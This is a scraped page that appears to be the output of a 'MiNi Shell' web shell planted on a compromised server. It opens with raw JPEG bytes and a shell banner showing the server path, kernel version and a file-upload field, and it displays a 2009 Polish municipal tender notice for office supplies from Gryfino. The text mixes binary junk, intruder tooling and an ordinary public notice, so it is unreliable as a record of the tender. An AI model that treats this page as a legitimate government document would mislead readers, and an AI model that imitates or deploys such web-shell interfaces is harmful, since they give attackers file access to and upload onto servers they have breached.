JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23650-N-2009.html

<p class="kh_header"><b>Gryfino: Zakup i dostawa materiałów biurowych dla Urzędu Miasta i Gminy w Gryfinie</b><br>
<b>Numer ogłoszenia: 23650 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gryfino , ul. 1 Maja 16, 74-100 Gryfino, woj. zachodniopomorskie, tel. 091 4162011, faks 091 4162702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> inwestycje@gryfino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów biurowych dla Urzędu Miasta i Gminy w Gryfinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych dla Urzędu Miasta i Gminy w Gryfinie.

Zakres zamówienia: 

1. Długopis typu Zenit - części metalowe niklowane (lub równoważny) - czarny - 100 szt.
2. Długopis typu Zenit - części metalowe niklowane (lub równoważny) - niebieski - 160 szt.
3. Długopis typu Zenit - części metalowe niklowane (lub równoważny) - czerwony - 60 szt.
4. Wkład metalowy do długopisu typu Zenit (lub równoważny) - czarny - 200 szt.
5. Wkład metalowy do długopisu typu Zenit (lub równoważny) - niebieski - 280 szt.
6. Wkład metalowy do długopisu typu Zenit (lub równoważny) - czerwony - 70 szt.
7. Długopis żelowy 0,5 gumowy uchwyt, wymienny czarny wkład - 170 szt.
8. Długopis żelowy 0,5 gumowy uchwyt, wymienny niebieski wkład - 240 szt.
9. Długopis żelowy 0,5 gumowy uchwyt, wymienny czerwony wkład	- 80 szt.
10. Wkład żelowy 0,5 - czarny - 280 szt.
11. Wkład żelowy 0,5 - niebieski - 300 szt.
12. Wkład żelowy 0,5 - czerwony - 150 szt.
13. Długopis automatyczny - niebieski, końcówka metalowa, gumowy uchwyt, przeźroczysta obudowa z wymiennym wkładem - 150 szt.
14. Wkład niebieski do długopisu j.w. - 200 szt.
15. Pióro typu Pelikan (lub równoważny) - na naboje - 2 szt.
16. Naboje atramentowe niebieskie j.w. (5 szt. w op.) - 7 op.
17. Pióro typu Waterman  (lub równoważny) - na naboje 	- 2 szt.
18. Naboje atramentowe niebieskie Waterman (8 szt. w op.). - 10 op.
19. Pióro typu Parker (lub równoważny) - na naboje - 2 szt.
20. Naboje atramentowe niebieskie j.w. (5 szt. w op.) - 20 op.
21. Pióro typu Parker (lub równoważny) - na atrament - 2 szt.
22. Atrament do pióra typu Parker (lub równoważny) - niebieski - 4 szt.
23. Atrament do pióra typu Parker (lub równoważny) - czarny - 3 szt.
24. Długopis stojący z przylepcem, możliwość przymocowania długopisu w pozycji pionowej, poziomej, wymienny wkład w kolorze niebieskim	- 30 szt.
25. Wkład niebieski do długopisu j.w. - 40 szt.
26. Ołówek automatyczny z wymiennym 0,5mm grafitem odporny na złamania, metalowy klip gumowy uchwyt, przeźroczysta obudowa oraz wymienna gumka do ścierania	- 40 szt.
27. Grafit HB 0,5 mm, odporny na złamania - 12 grafitów w. op. - 40 op.
28. Ołówek automatyczny z wymiennym 0,7 mm grafitem odporny na złamania, metalowy klip gumowy uchwyt, przeźroczysta obudowa oraz wymienna gumka do ścierania	- 40 szt.
29. Grafit HB 0,7mm, odporny na złamania - 12 grafitów w op. - 40 op.
30. Ołówek HB z gumką, wykonany z żywicy syntetycznej, super trwały, niełamliwy grafit, w razie złamania nie pozostawia drzazgi i nie kaleczy - 80 szt.
31. Temperówka podwójna z pojemnikiem, stalowe ostrze mocowane wkrętem, do temperowania standartowych i grubych ołówków, kredek	- 50 szt.
32. Gumka naturalna do ścierania grafitów różnych twardości, 53x29x13 - 100 szt.
33. Marker permanentny, wodoodporny, ścięta końcówka, 3 mm - czarny, 12 szt. w op. - 108 szt.
34. Marker permanentny, wodoodporny, ścięta końcówka, 3 mm - czerwony, 12 szt. w op. - 96 szt.
35. Marker permanentny, wodoodporny, okrągła końcówka, 3 mm - czarny, 12 szt. w op. - 84 szt.
36. Marker permanentny, wodoodporny, okrągła końcówka, 3 mm - czerwony, 12 szt. w op. - 60 szt.
37. Marker permanentny 0,7 mm wodoodporny czarny, do opisywania płyt CD, DVD - 30 szt.
38. Cienkopis 0,3 mm, końcówka metalowa, system DRY SAFE - czarny - 100 szt.
39. Cienkopis 0,3 mm końcówka metalowa, system DRY SAFE - niebieski - 80 szt.
40. Cienkopis 0,3 mm końcówka metalowa, system DRY SAFE - czerwony - 50 szt.
41. Kredki 8 kolorów (rysowanie na mapach) - 11 op.
42. Nożyczki - ostrze 21 cm wykonane ze stali nierdzewnej, wyprofilowana rękojeść z niełamliwego plastiku, gumowy uchwyt - 50 szt.
43. Zakreślasz fluorescencyjny, ścięta końcówka - żółty - 120 szt.
44. Zakreślasz fluorescencyjny, ścięta końcówka - zielony - 70 szt.
45. Zakreślasz fluorescencyjny, ścięta końcówka - 4 kolory w op. - 80 op.
46. Brulion A-4, kratka, 96 kartkowy, twarda oprawa, zszywany - 70 szt.
47. Zeszyt A-5, kratka, 60 kartkowy - 30 szt.
48. Zeszyt A-5, kratka, 32 kartkowy - 50 szt.
49. Skorowidz A-4, kratka, 96 kartkowy, twarda oprawa, zszywany	 - 20 szt.
50. Skorowidz A-4 - ?, kratka, 96 kartkowy, zszywany - 10 szt.
51. Blok biurowy A-4, 100 kartkowy, kratka - 80 szt.
52. Kostka samoprzylepna 76 mm x 76 mm, 450 kartek - 4 jaskrawe fluorescencyjne kolory - 150 szt.
53. Bloczek samoprzylepny 38 mm x 51 mm, 12 szt. w op. - 150 op.
54. Bloczek samoprzylepny 4 x 20 mm x 50 mm,  4 kolory w op. - 300 op.
55. Zakładka indeksująca 15 mmx 50 - 5 kolorów w op. - 300 op.
56. Kostka 85 mm x 85 mm, nie klejona, biała, 400 kartek	- 100 szt.
57. Kostka 85 mm x 85 mm, nie klejona, kolorowa 400 kartek - 70 szt.
58. Kostka 85 mm x 85 mm,  klejona, biała, 400 kartek - 50 szt.
59. Kostka 85 mm x 85 mm,  klejona, kolorowa, 400 kartek - 40 szt.
60. Kostka w pojemniku akrylowym,5 x 8,5 x 8,5 cm, przeźroczysta	- 40 szt.
61. Wkład do pojemnika akrylowego - 40 szt.
62. Kostka samoprzylepna w kształtach: strzałka, kwiatek, 3 kolory, 
w bloczku 225 kart - 130 szt.
63. Segregator A-4 80, na dolnych krawędziach metalowe okucia - 250 szt.
64. Segregator A-4 75, na dolnych krawędziach metalowe okucia - 180 szt.
65. Segregator A-4 50, na dolnych krawędziach metalowe okucia - 180 szt.
66. Teczka do podpisu A-4, z kartonu pokryta skóropodobnym tworzywem 20 kart., kolor granatowy, bordowy, mocowane nitami grzbiet harmonijkowy - 7 szt.
67. Folia A-4 laminacyjna, antystatyczna 80 mic., 100 szt. w op. - 15 op.
68. Folia A-5 laminacyjna, antystatyczna 80 mic., 100 szt. w op. - 2 op.
69. Folia 60x95 laminacyjna, antystatyczna 2x100 mic., 100 szt. w op. - 3 op.
70. Koszulki na dokumenty A-4, 100 szt. w op. - 100 op.
71. Koszulki na dokumenty A-5, 100 szt. w op. - 5 op.
72. Koszulka z klapką A-4, o grubości 100 mic., 10 szt. w op. - 100 op.
73. Teczka A4 lakierowana, zamykana na 2 narożne gumki - 100 szt.
74. Teczka plastikowa zamykana na 2 narożne gumki, kolorowa 245x320 (większa od A4) z możliwością opisu - 100 szt.
75. Teczka wiązana tekturowa A-4 - 400 szt.
76. Teczka wiązana plastikowa A-4 - 200 szt.
77. Teczka do akt osobowych, oklejana twarda oprawa introligatorska wg dostarczonego wzoru - 50 szt.
78. Teczka A-4 z gumką 40mm mieści do 350 kartek, metalowe zapięcie na gumkę, kolor - niebieski, czarny, zielony - 120 szt.
79. Deska z klipem - teczka A-4 służąca do przytrzymania kartek papieru, posiada kieszeń na wewnętrznej stronie okładki i uchwyt na długopis - 30 szt.
80. Skoroszyt A-4, tektura o grubości 250g m2, z listwą do wpinania - 3100 szt.
81. Skoroszyt PCV A4 z listwą do wpinania - 400 szt.
82. Skoroszyt oczkowy pełny, tektura o grubości 250g 2 - duże oczka - 2000 szt.
83. Skoroszyt PCV A-4 zawieszany do segregatora  - 600 szt.
84. Okładka do bindowania A-4, karton, 100 szt. w op. - biała - 3 op.
85. Okładka do bindowania A-4, karton, 100 szt. w op. - czarna - 3 op.
86. Okładka do bindowania A-4, karton, 100 szt. w op. -niebieska - 3 op.
87. Okładka do bindowania A-4, karton, 100 szt. w op. - zielona - 3 op.
88. Folia do bindowania A4 200 mic., 100 szt. w op. - przeźroczysta - 3 op.
89. Folia do bindowania A4  200 mic., 100 szt. w op. - czarna - 3 op.
90. Folia do bindowania A4  200 mic., 100 szt. w op. - niebieska - 3 op.
91. Folia do bindowania A4  200 mic., 100 szt. w op. - zielona - 3 op.
92. Grzbiet do bindowania, 20mm plastikowy 100 szt. w op. - biały  - 3 op.
93. Grzbiet do bindowania, 20 mm plastikowy, 100 szt. w op. - czarny - 3 op.
94. Grzbiet do bindowania, 20 mm plastikowy, 100 szt. w op. - niebieski - 3 op.
95. Grzbiet do bindowania, 20 mm plastikowy, 100 szt. w op. - zielony - 3 op.
96. Grzbiet do bindowania 7 mm, system UNIBIND, kolor aluminium, 
100 szt. w op. - 1 op.
97. Klej w sztyfcie, 35 g, do papieru, tektury, fotografii, nie zawiera rozpuszczalnika - 130 szt.
98. Klej z dozownikiem w pędzelku do papieru, kartonu - 50 ml - 50 szt.
99. Korektor w płynie (gąbka) 20 ml., szybkoschnący, Eco na bazie wody - 100 szt.
100. Korektor w taśmie: 4,2mmx9m, posiada czerwona osłonkę, która chroni taśmę korygującą, nie zawiera rozpuszczalników - 60 szt.
101. Podajnik ręczny do taśmy samoprzylepnej, 19 mm x 33 mm, metalowe ząbkowane ostrze, antypoślizgowa podstawa - 40 szt.
102. Taśma samoprzylepna do podajnika - 80 szt.
103. Taśma Gęsia skórka, szer. 13 mm, dł. 25 m - 40 szt.
104. Taśma samoprzylepna pakowa przeźroczysta, 50 mm x 66 m, brązowa - 40 szt.
105. Taśma dwustronnie klejąca, 38 mm x 25 m	- 50 szt.
106. Dziurkacz - dziurkuje 65 kartek, przedłużona rączka ułatwia dziurkowanie większej partii, 5 lat gwarancji - 10 szt.
107 - Dziurkacz przeznaczony do obszernych plików, podstawa i ramię wykonane z aluminium, antypoślizgowa podstawa, metalowy precyzyjny ogranicznik formatu A3, A4, A6, blokada ramienia pozwala przechowywać dziurkacz z maksymalnie obniżonym ramieniem - 10 szt.
108. Pojemnik magnetyczny na spinacze, gumowy ogranicznik na spodzie, srebrny, czarny - 40 szt.
109. Linijka z przeźroczystego polistyrenu, 30 cm - 40 szt.
110. Linijka metalowa, 50 cm - 20 szt.
111. Pinezki - kołeczki kolorowe, 50 szt. w op. - 60 op.
112. Poduszka do stempli 160 x 90 mm, nasączona czerwonym tuszem - 15 szt.
113. Tusz do stempli gumowych, czerwony, 25 ml. - 40 szt.
114. Tusz czerwony do stempli metalowych - 3 szt.
115. Zszywacz metalowy, zszywa do 50 kartek, typu Leitz (lub równoważny) 24 na 6 i inne rodzaje zszywek - 30 szt.
116. Zszywacz metalowy, zszywa 120 i więcej kartek, wykorzystuje różne rodzaje zszywek typ Leitz, Laco (lub równoważny) - 10 szt.
117. Zszywki stalowe galwanizowane  23 na 13, 1000 szt. w op. - 10 op.
118. Zszywki 24 na 6, cynkowane, grubość zszywanego pliku 30 na 3 (ilość kartek, mm), 1000 szt. w op., typu Eagle, Argo, Leitz - 250 op.
119. Spinacze metalowe okrągłe R-28mm, 100 szt. w op. - 200 op.
120. Spinacze metalowe R-50, 50 szt./op. - 10 op.
121. Kalka ołówkowa typu Pelikan (lub równoważny) 25 arkuszy - 20 op.
122. Rozszywacz do usuwania wszystkich rodzajów zszywek - 30 szt.
123. Koperta C-6 biała, samoprzylepna z paskiem, 50 szt. w op. - 15000 szt.
124. Koperta C-5 biała, samoprzylepna z paskiem, 50 szt. w op. - 6000 szt.
125. Koperta C-4 biała, samoprzylepna z paskiem, 50 szt. w op. - 3000 szt.
126. Koperta B-4 biała, samoprzylepna, z paskiem, 50 szt. w op. - 3000 szt.
127. Koperta samoklejąca z paskiem z rozszerzonymi bokami i spodem, 
250 mm x 353 mm x 38 mm, B4 - 300 szt.
128. Koperta samoklejąca z paskiem z rozszerzonymi bokami i spodem, 
280 mm x 400 mm x 40 mm, E4 - 200 szt.
129. Koperta DLK, biała z okienkiem po prawej stronie, samoprzylepna - 17000 szt.
130. Koperta ze zwrotnym potwierdzeniem odbioru, 500 szt. w op., samoprzylepna, po prawej stronie koperty adresat, lewa nadawca, również na zwrotce po prawej adresat, lewa nadawca. Bez napisów na zwrotce Potwierdzenie odbioru w sprawie karnej- cywilnej - 30000 szt.
131. Zwrotne potwierdzenie odbioru - kartonikowe, samoklejące z paskiem (pasek na całej szerokości zwrotki) po prawej stronie adresat, lewa - nadawca - 20000 szt.
132. Koperta A-4, biała z warstwą folii bąbelkowej samoklejąca z paskiem - 100 szt.
133. Koperta biała - B-4, biała z warstwą folii bąbelkowej samoklejąca 
z paskiem - 100 szt.
134. Koperta biała - C-5, biała z warstwą folii bąbelkowej samoklejąca 
z paskiem - 100 szt.
135. Papier ksero A-4, klasa A, biały, 80g m2, białość 166 CIE, 500 ark. POLjet - 2000 ryz
136. Papier ksero A-3, klasa A, biały, 80g m2, białość 166 CIE, 500 ark. POLjet - 100 ryz
137. Papier ksero A-4 80g/m2, 500 szt. w op. - żółty - 8 ryz
138. Papier ksero A-4 80g/m2, 500 szt. w op. - niebieski - 7 ryz
139. Papier ksero A-4 80g/m2, 500 szt. w op. - czerwony - 6 ryz
140. Papier ksero A-4 80g/m2, 500 szt. w op. - pomarańczowy - 7 ryz
141. Karton wizytówkowy A-4, 20 ark. w op., tłoczony, 240 g linie biały (dyplomy, zaproszenia), do drukarek laserowych i atramentowych - 40 op.
142. Karton wizytówkowy A-4, 20 ark./op., tłoczony, 240 g linie kremowy (dyplomy, zaproszenia), do drukarek laserowych i atramentowych - 40 op.
143. Karton wizytówkowy A-4, 20 ark. w op., tłoczony, 240 g kryształ biały (dyplomy, zaproszenia), do drukarek laserowych i atramentowych - 40 op.
144. Karton wizytówkowy A-4, 20 ark. w op., tłoczony, 240 g kryształ kremowy (dyplomy, zaproszenia), do drukarek laserowych i atramentowych - 40 op.
145. Papier karton A-4, 30 szt. w op. - czerwony - 4 op.
146. j.w. zielony - 4 op.
147. j.w. żółty - 4 op.
148. j.w. granatowy - 4 op.
149. Okładka do dyplomu - granatowa	- 150 szt.
150. Okładka do dyplomu - niebieska - 50 szt.
151. Okładka do dyplomu - wiśnia - 200 szt.
152. Papier samoprzylepny A-4, 210 mm x 297 mm, 100 kart w op. - 18 op.
153. Nóż z w wymiennym ostrzem, długość 15 cm. - 6 szt.
154. Klipsy do dokumentów 19 mm, 12 szt. w op. - 110 op.
155. Klipsy do dokumentów 32 mm, 12 szt. w op. - 130 op.
156. Klipsy do dokumentów 51 mm, 12 szt. w op. - 60 op.
157. Fastykuła archiwalna, tekturowa A-4 (dwie dziurki) - 700 szt.
158. Termookładka A-4 250g - 3 mm, 100 szt. w op. - 1 op.
159. Termookładka A-4 250g - 6 mm, 100 szt. w op. - 1 op.
160. Termookładka A-4 250g - 10 mm, 80 szt. w op. - 1 op.
161. Termookładka A-4 250g - 12 mm, 80 szt. w op. - 1 op.
162. Termookładka A-4 250g - 20 mm, 80 szt. w op. - 1 op.
163. Kalkulator CITIZEN SDC 888 biurowy lub równoważny (lub równoważny) - 16 szt.
164. Kalkulator CITIZEN CX 123II z taśmą, 12 pozycji, dwukolorowa drukarka	- 5 szt.
165. Przekładki kartonowe do segregatorów, 190g m2, 240 mm x 105 mm, A-4, różne kolory, 100 szt. w op. - 25 op.
166. Teczka harmonijkowa w przegródki, kieszeń na płytę CD, czarna - 17 szt.
167. Pojemnik na dokumenty z dwiema wyjmowanymi przegródkami, duża - na grube publikacje, mocny plastik, kolor - czarny - 30 szt.
168. Koszulki na 4 płyty CD, DVD, w zestawie etykiety- 10 szt. w op. - 10 op.
169. Pojemnik na katalogi, kartonowy, szerokość grzbietu 80 mm - 3 szt.
170. Pojemniki - szuflady plastikowe na dokumenty z przeźroczystego akrylu, możliwość łączenia półek - 90 szt.
171. Przybornik biurowy z akrylu wielofunkcyjny (długopisy, spinacze, bloczek papierowy itp.), przeźroczysty - 36 szt.
172. Klips archiwizacyjny 50 szt. w op - 1 op.
173. Spinacz owalny R50, 100 szt. w op. - 20 op.
174. Tablica korkowa w ramce MDF 120x90 cm - 1 szt.
175. Tablica korkowa w ramce MDF 200x100 cm	 - 2 szt.
176. Tablica korkowa w ramce MDF 30x45 cm - 5 szt.
177. Tablica korkowa w ramce MDF 80x80 cm - 1 szt.
178. Magnesy do tablic 10 szt. w op. - 20 op.
179. Długopis żelowy fluorescencyjny, 10 kolorów w op. - 10 op.
180. Podkładka na biurko - gruba a jednocześnie z wierzchu miękka
 (możliwość odbijania pieczęci metalowej - tłoczonej) - 3 szt.
181. Podkładka na biurko, przeźroczysta o wym.: 65x 50 cm - 10 szt.
182. Wąsy skoroszytowe do spinania luźnych kartek, 100 szt. w op. - 12 op.
183. Książka kancelaryjna A-4, twarda oprawa, 96 kartkowa - 5 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6, 30.19.20.00-1, 30.19.90.00-0, 22.85.10.00-0, 30.19.40.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia publicznego mogą uczestniczyć wykonawcy, którzy:
1) nie podlegają wykluczeniu na podstawie art. 24 ustawy,
2) spełniają wymagania określone w art. 22 ust. 1 ustawy.

Zamawiający oceni spełnienie powyższych wymagań poprzez szczegółową analizę dokumentów złożonych przez wykonawców.

Każdy z wykonawców składających ofertę wspólną musi spełniać powyższe warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy, tj.:
1) posiada uprawnienia do wykonywania działalności lub czynności,
2) posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlega wykluczeniu z postępowania o udzielenie zamówienia.

Od wykonawcy przystępującego do postępowania o udzielenie zamówienia publicznego wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów:
1) aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne, społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt: 1), 2) - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

W przypadku, gdy Wykonawca składa ofertę równoważną zobowiązany jest, w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do złożenia próbek, opisów lub fotografii produktów równoważnych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gryfino.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy (pok. nr 6); ul. 1 Maja 16; 74-100 Gryfino.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2009 godzina 09:00, miejsce: Biuro Obsługi Interesantów w Urzędzie Miasta i Gminy; ul. 1 Maja 16; 74-100 Gryfino.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com